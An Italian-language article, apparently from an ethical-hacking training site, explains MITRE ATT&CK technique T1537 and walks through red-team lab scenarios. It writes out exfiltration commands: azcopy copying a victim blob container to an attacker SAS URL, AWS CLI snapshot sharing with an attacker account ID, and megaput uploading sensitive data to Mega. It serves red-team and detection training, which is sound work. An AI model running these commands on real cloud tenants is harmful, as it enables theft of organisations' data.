Esfiltrazione verso Account Cloud: Transfer Data to Cloud Account (T1537)

Quando un avversario ha già messo le mani sui dati di un'organizzazione, la mossa più intuitiva è portarli fuori dalla rete — e i team di sicurezza lo sanno bene, monitorando il traffico in uscita verso destinazioni esterne. Ma cosa succede se l'attaccante copia tutto in un secondo account cloud all'interno dello stesso provider? Il traffico resta nella rete interna del cloud, sfrutta API native e non attraversa mai il perimetro classico. Questa è l'essenza della tecnica T1537, che si colloca nella tattica Exfiltration (TA0010) — la fase della kill chain in cui l'avversario cerca di sottrarre dati dal bersaglio.

I meccanismi sono diversi e variano per provider: snapshot di volumi condivisi con account esterni, policy di bucket S3 modificate per concedere accesso cross-account, link di condivisione anonimi su OneDrive o Google Drive, URI SAS (Shared Access Signature) in Azure che garantiscono accesso temporaneo senza autenticazione al tenant. In alcuni incidenti documentati, gli attaccanti hanno creato backup completi di istanze cloud e li hanno trasferiti verso account sotto il proprio controllo.

La tecnica è particolarmente insidiosa perché i trasferimenti avvengono nello spazio di indirizzamento interno del provider, sfuggendo a firewall perimetrali e proxy. Tre gruppi APT risultano attivamente associati a questo approccio, con 4 mitigazioni e un modello di detection cross-platform a tre analisi distinte (IaaS, Office Suite, SaaS).


Il cuore di questa simulazione è dimostrare quanto sia banale, con credenziali cloud valide, spostare dati verso un account controllato dall'attaccante senza generare traffico di rete "anomalo". L'obiettivo del red team è replicare esattamente ciò che fanno i gruppi documentati: usare strumenti nativi o utility legittime per copiare dati da un tenant vittima verso un tenant avversario.

Scenario Azure con AzCopy. Storm-0501 ha utilizzato AzCopy, l'utility CLI ufficiale di Microsoft per trasferire dati da e verso Azure Storage (gratuito, distribuito da Microsoft). In laboratorio, dopo aver compromesso un Service Principal o un account con permessi su un container Blob, il trasferimento è immediato:

azcopy copy "https://.blob.core.windows.net/?<SAS-TOKEN-VITTIMA>" "https://.blob.core.windows.net/?<SAS-TOKEN-ATTACCANTE>" --recursive

Il flag --recursive copia l'intero albero di directory. Il traffico non esce mai dal backbone Azure. Per il red team, il punto critico è generare il SAS token con le permission minime (Read, List) — un'attività che simula l'abuso di una misconfiguration reale. Verificate nei log di CloudTrail o Azure Monitor se l'alert scatta entro la finestra temporale definita dal blue team.

Scenario AWS con snapshot cross-account. Su AWS la tecnica prevede la condivisione di uno snapshot EBS con un account esterno. La catena operativa in AWS CLI (gratuito) è:

aws ec2 create-snapshot --volume-id vol-<ID-VOLUME> --description "backup"

Una volta creato lo snapshot, si modifica il permesso di condivisione:

aws ec2 modify-snapshot-attribute --snapshot-id snap-<ID-SNAPSHOT> --attribute createVolumePermission --operation-type add --user-ids <ACCOUNT-ID-ATTACCANTE>

Dall'account attaccante si crea poi un volume dallo snapshot condiviso e si accede ai dati. L'intera operazione produce eventi CloudTrail specifici (CreateSnapshot, ModifySnapshotAttribute) ma il trasferimento dati effettivo avviene internamente ad AWS.

Scenario Mega con megatools. RedCurl ha utilizzato megatools (open source), un set di utility a riga di comando per interagire con il servizio Mega. Il comando base per l'upload è:

megaput --path /Root/exfil/ /percorso/dati/sensibili

Mentre INC Ransom ha preferito MEGAsync (gratuito), il client desktop ufficiale di Mega che sincronizza automaticamente cartelle locali con il cloud. In un engagement red team, configurare MEGAsync su una cartella contenente i dati raccolti simula fedelmente il comportamento osservato.

Per tutti gli scenari, documentate con precisione timestamp di inizio e fine trasferimento: il blue team dovrà correlare questi eventi con le proprie detection.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo